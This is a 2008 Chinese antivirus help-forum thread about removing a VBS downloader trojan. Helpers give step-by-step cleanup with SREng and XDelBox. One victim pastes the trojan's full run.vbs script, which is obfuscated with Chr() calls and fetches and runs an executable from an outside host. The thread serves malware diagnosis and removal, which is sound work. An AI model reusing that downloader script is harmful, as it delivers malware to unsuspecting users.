12   2  /  2  页   跳转

guTrojan.DL.Script.VBS.Agent.xiy【求助

收藏
nffy逆风飞扬
头像
初生襁褓狮
  • 帖子:13
  • 注册: 2008-04-18
  • 来自:
发表于: 2008-04-18 15:18 | 只看楼主 短消息 资料
字号: 11楼

sreng日志
是用什么扫描的
gototop
 
nffy逆风飞扬
头像
初生襁褓狮
  • 帖子:13
  • 注册: 2008-04-18
  • 来自:
发表于: 2008-04-18 15:22 | 只看楼主 短消息 资料
字号: 12楼

稍等正在弄
gototop
 
nffy逆风飞扬
头像
初生襁褓狮
  • 帖子:13
  • 注册: 2008-04-18
  • 来自:
发表于: 2008-04-18 15:26 | 只看楼主 短消息 资料
字号: 13楼

sreng日志在附件里面

附件附件:

下载次数:128
文件类型:application/octet-stream
文件大小:
上传时间:2008-4-18 15:26:42
描述:
gototop
 
lqqk7
头像
社区嘉宾
  • 帖子:4876
  • 注册: 2006-03-15
  • 来自:
发表于: 2008-04-18 16:09 | 短消息 资料
字号: 14楼

引用:
【nffy逆风飞扬的贴子】sreng日志在附件里面
………………

先下载工具:
windows清理助手下载:http://www.arswp.com/download.html
XDelBox下载:http://www.dodudou.com/down/    打开后选择【原创软件】,下载XDelBox1.6。
清理临时文件工具ATF-Cleaner-cn下载:http://www.qispace.com.cn/attachment.php?fid=34
———————————————————————————————————————
务必断开网络链接后再进行以下操作;
———————————————————————————————————————
使用XDelBox删除以下文件:
XDelBox使用方法:http://forum.ikaka.com/topic.asp?board=28&artid=8381032
使用时一定拔掉所有移动存储设备,将下面分隔线中的的文件路径全部复制,然后打开XDelBox直接使用右键菜单的“剪贴板导入不检查路径”导入,勾选“抑制再生”、“驱动安全删除模式”、“备份文件”,最后选择右键菜单的“立刻重启删除”。
———————————————————————————————————————
c:\windows\svchost.exe
———————————————————————————————————————
重启计算机后会看到一个请选择要启动的操作系统的提示,倒计时5秒,
第一个选项是你自己的Windows系统,
第二个选项是XDelBox的Go XDelBox To Del Files,
默认自动选择第二项,会进入类似DOS的界面,这期间什么操作都不用做,等待它自动运行即可,
待病毒文件删除后会自动重启进入Windows系统,
然后再按以下步骤操作:
———————————————————————————————————————
打开SREngPS.EXE,选择【启动项目】-【服务】-【Win32服务应用程序】,将以下项删除:
[System Themes / System Themes]    <C:\WINDOWS\SVCHOST.EXE>
———————————————————————————————————————
打开SREngPS.EXE,选择【启动项目】-【服务】-【驱动程序】,将以下项删除:
[16274968 / 16274968]    <>
[16274968 / 16274968]    <>
———————————————————————————————————————
使用刚下载的“清理临时文件工具ATF-Cleaner-cn”,全选所有项目,点击【立即清理】;
———————————————————————————————————————
使用刚下载的“Windows清理助手”清理你的系统。
———————————————————————————————————————
gototop
 
天月来了
头像
版主
  • 帖子:76904
  • 注册: 2007-02-06
  • 来自:
发表于: 2008-04-18 16:16 | 短消息 资料
字号: 15楼

删这些干什么??

一贯好象都没问题呀

c:\program files\winrar\formats\ace.fmt
c:\program files\winrar\formats\arj.fmt
c:\program files\winrar\formats\bz2.fmt
c:\program files\winrar\formats\cab.fmt
c:\program files\winrar\formats\gz.fmt
c:\program files\winrar\formats\iso.fmt
c:\program files\winrar\formats\lzh.fmt
c:\program files\winrar\formats\tar.fmt
c:\program files\winrar\formats\uue.fmt
gototop
 
lqqk7
头像
社区嘉宾
  • 帖子:4876
  • 注册: 2006-03-15
  • 来自:
发表于: 2008-04-18 16:44 | 短消息 资料
字号: 16楼

引用:
【天月来了的贴子】删这些干什么??

一贯好象都没问题呀

c:\program files\winrar\formats\ace.fmt
c:\program files\winrar\formats\arj.fmt
c:\program files\winrar\formats\bz2.fmt
c:\program files\winrar\formats\cab.fmt
c:\program files\winrar\formats\gz.fmt
c:\program files\winrar\formats\iso.fmt
c:\program files\winrar\formats\lzh.fmt
c:\program files\winrar\formats\tar.fmt
c:\program files\winrar\formats\uue.fmt

………………

我真的眼花了,刚才看了n遍都是看着这些东西注入smss.exe进程里去了,我也纳闷呢。你这一说我在去重新看他日志才看到是winrar.exe进程。
看了一下午超长的日志,看来眼睛真的不行了......
gototop
 
lqqk7
头像
社区嘉宾
  • 帖子:4876
  • 注册: 2006-03-15
  • 来自:
发表于: 2008-04-18 16:52 | 短消息 资料
字号: 17楼

不对,我眼没花,是分析助手读取日志的时候错位了

附件附件:

下载次数:393
文件类型:image/pjpeg
文件大小:
上传时间:2008-4-18 16:52:06
描述:
预览信息:EXIF信息
gototop
 
mnipp
头像
初生襁褓狮
  • 帖子:1
  • 注册: 2008-04-21
  • 来自:
发表于: 2008-04-21 18:18 | 短消息 资料
字号: 18楼

我也出现了这个问题。出现监控提示的内容一样。提示之前会生成一个run.vbs的脚本。瑞星可以查出为病毒。路径为C:\WINDOWS\system32\run.vbs 内容为set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(119)+Chr(119)+Chr(119)+Chr(46)+Chr(57)+Chr(49)+Chr(100)+Chr(110)+Chr(97)+Chr(46)+Chr(99)+Chr(111)+Chr(109)+Chr(47)+Chr(110)+Chr(115)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Chr(50)+Chr(48)+Chr(48)+Chr(56)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
oshell.run Chr(50)+Chr(48)+Chr(48)+Chr(56)+Chr(46)+Chr(101)+Chr(120)+Chr(101)

好象是自动下载一个http://www.91dna.com/ns.exe文件,再自动运行。谁有解决办法~!!
gototop
 
lqqk7
头像
社区嘉宾
  • 帖子:4876
  • 注册: 2006-03-15
  • 来自:
发表于: 2008-04-22 11:42 | 短消息 资料
字号: 19楼

【回复“mnipp”的帖子】
是打开网页的时候提示的吗
gototop
 
<<上一主题|下一主题>>
12   2  /  2  页   跳转
页面顶部
Powered by Discuz!NT